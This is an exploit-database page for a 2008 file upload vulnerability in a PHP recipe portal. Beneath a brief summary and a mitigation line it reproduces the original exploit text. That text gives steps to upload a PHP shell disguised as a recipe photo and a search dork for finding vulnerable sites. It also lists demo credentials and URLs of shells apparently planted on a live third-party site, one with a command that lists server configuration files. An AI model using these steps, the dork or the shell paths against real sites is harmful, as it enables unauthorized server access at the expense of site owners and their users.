ScriptsFeed (SF) Recipes Listing Portal Remote File Upload

vendor:

Recipes Listing Portal

by:

ZoRLu

8.8

CVSS

HIGH

Remote File Upload

264

CWE

Product Name: Recipes Listing Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ScriptsFeed (SF) Recipes Listing Portal Remote File Upload

A vulnerability exists in ScriptsFeed (SF) Recipes Listing Portal which allows an attacker to upload arbitrary files to the server. An attacker can exploit this vulnerability by registering to the website, logging in, clicking on 'Add a Recipe' and adding a recipe. After clicking on 'View your Recipes', the attacker can right click on the photo and select properties to copy the photo link. The attacker can then paste the link in the explorer and add the path of the shell to the end of the link. This will allow the attacker to upload the shell to the server and gain access to the server.

Mitigation:

The website should have proper validation checks in place to ensure that only authorized files are uploaded to the server.

Source

Exploit-DB raw data:

[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( Ã§ok site var sÃ¶mÃ¼rÃ¼n : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

you register to site 

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you click to "Add a Recipe" and add recipe

and after click to "View your Recipes" click to you recipe open new page 

right click to your photo. select properties copy photo lick

and paste your explorer go your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )

misal:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]